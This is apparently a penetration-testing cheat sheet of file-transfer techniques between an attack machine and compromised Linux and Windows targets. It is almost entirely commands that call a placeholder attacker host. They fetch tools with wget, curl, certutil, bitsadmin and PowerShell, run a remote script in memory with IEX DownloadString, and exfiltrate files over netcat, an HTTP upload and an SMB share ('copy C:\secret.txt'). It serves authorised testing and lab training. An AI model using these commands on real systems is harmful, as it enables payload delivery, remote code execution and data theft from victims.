During penetration tests, you often need to transfer files between your attack machine and compromised targets. This guide covers various file transfer techniques for both Linux and Windows environments.
Python HTTP Server
# On attacker (serve files)
python3 -m http.server 8080
python2 -m SimpleHTTPServer 8080
# On target (download)
# Linux
wget http://attacker:8080/file
curl http://attacker:8080/file -o file
# Windows
certutil -urlcache -f http://attacker:8080/file file.exe
powershell -c "(New-Object Net.WebClient).DownloadFile('http://attacker:8080/file','file.exe')"
powershell Invoke-WebRequest -Uri http://attacker:8080/file -OutFile file.exeNetcat
# Receiver (attacker)
nc -lvnp 4444 > received_file
# Sender (target)
nc attacker_ip 4444 < file_to_send
# Alternative with timeout
nc -w 3 attacker_ip 4444 < file_to_sendSCP and SSH
# Copy to remote
scp file.txt user@target:/path/
# Copy from remote
scp user@target:/path/file.txt .
# Copy directory
scp -r directory/ user@target:/path/
# Using SSH
ssh user@target "cat > /tmp/file" < local_fileBase64 Encoding
# When no file transfer tools available
# On attacker - encode file
base64 -w 0 file > file.b64
cat file.b64
# On target - decode (Linux)
echo "BASE64_STRING" | base64 -d > file
# On target - decode (Windows PowerShell)
[IO.File]::WriteAllBytes("C:\file.exe", [Convert]::FromBase64String("BASE64_STRING"))SMB Server
# On attacker (Impacket)
impacket-smbserver share /path/to/files
impacket-smbserver share /path/to/files -smb2support
impacket-smbserver share /path/to/files -smb2support -user test -password test
# On Windows target
copy \\attacker_ip\share\file.exe C:\temp\
net use Z: \\attacker_ip\share
xcopy \\attacker_ip\share\file.exe C:\temp\
# Copy file TO attacker
copy C:\secret.txt \\attacker_ip\share\PowerShell Methods
# Download file
Invoke-WebRequest -Uri http://attacker/file -OutFile file.exe
(New-Object Net.WebClient).DownloadFile("http://attacker/file","file.exe")
iwr -uri http://attacker/file -outfile file.exe
# Download and execute in memory
IEX(New-Object Net.WebClient).DownloadString('http://attacker/script.ps1')
powershell -c "IEX(IWR http://attacker/script.ps1)"
# Upload file
(New-Object Net.WebClient).UploadFile("http://attacker/upload","C:\file.txt")
# Base64 encoded command
powershell -enc BASE64_ENCODED_COMMANDCertutil (Windows)
# Download file
certutil -urlcache -f http://attacker/file.exe file.exe
# Encode to base64
certutil -encode file.exe encoded.txt
# Decode from base64
certutil -decode encoded.txt file.exeBitsadmin (Windows)
bitsadmin /transfer job /download /priority high http://attacker/file C:\file.exeFTP
# On attacker - start FTP server
python3 -m pyftpdlib -p 21 -w
# On Linux target
ftp attacker_ip
# binary, get file, quit
# On Windows - create script
echo open attacker_ip > ftp.txt
echo anonymous >> ftp.txt
echo anonymous >> ftp.txt
echo binary >> ftp.txt
echo get file.exe >> ftp.txt
echo quit >> ftp.txt
ftp -s:ftp.txtPHP
# Download
php -r "file_put_contents('file', file_get_contents('http://attacker/file'));"
# Using curl
php -r '$ch=curl_init("http://attacker/file");$fp=fopen("file","w");curl_setopt($ch,CURLOPT_FILE,$fp);curl_exec($ch);'Upload Servers
# Simple Python upload server
# Create uploadserver.py
import http.server
import cgi
class Handler(http.server.SimpleHTTPRequestHandler):
def do_POST(self):
form = cgi.FieldStorage(fp=self.rfile, headers=self.headers,
environ={'REQUEST_METHOD':'POST'})
with open(form['file'].filename, 'wb') as f:
f.write(form['file'].file.read())
self.send_response(200)
self.end_headers()
http.server.HTTPServer(("",8080), Handler).serve_forever()
# Upload with curl
curl -F "file=@/path/to/file" http://attacker:8080/Summary
Having multiple file transfer techniques at your disposal is essential during penetration tests. Network restrictions may block certain protocols, so knowing alternatives ensures you can always move tools and data. Practice these methods in your lab environment to use them quickly during engagements.
